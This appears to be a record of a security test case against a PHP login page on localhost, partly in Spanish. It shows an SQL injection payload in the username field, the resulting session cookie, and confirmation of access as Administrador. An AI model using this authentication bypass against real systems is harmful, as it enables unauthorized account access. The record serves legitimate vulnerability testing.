=== CP-AUTH-002: SQLi bypass login ===
--- Request ---
POST /setup/procesalogin.php
frmusuario=' OR '1'='1' -- &frmpassword=cualquier_valor

--- Response headers + body ---
HTTP/1.1 302 Found
Host: localhost:8000
Date: Thu, 02 Jul 2026 00:42:36 GMT
Connection: close
X-Powered-By: PHP/8.5.8
Set-Cookie: PHPSESSID=b685c43ec8626bbf21c76ee85f4d133a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location:../index.php
Content-type: text/html; charset=UTF-8


--- Cookie jar (PHPSESSID establecida) ---
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

localhost	FALSE	/	FALSE	0	PHPSESSID	b685c43ec8626bbf21c76ee85f4d133a

--- Verificacion: acceso a index.php con la sesion obtenida ---
   Bienvenido :Administrador - <a href=setup/cerrar_sesion.php>Cerra Sesión</a></nav>
                <input type="text" class="form-control" id="usuario" name="usuario" value="Administrador">
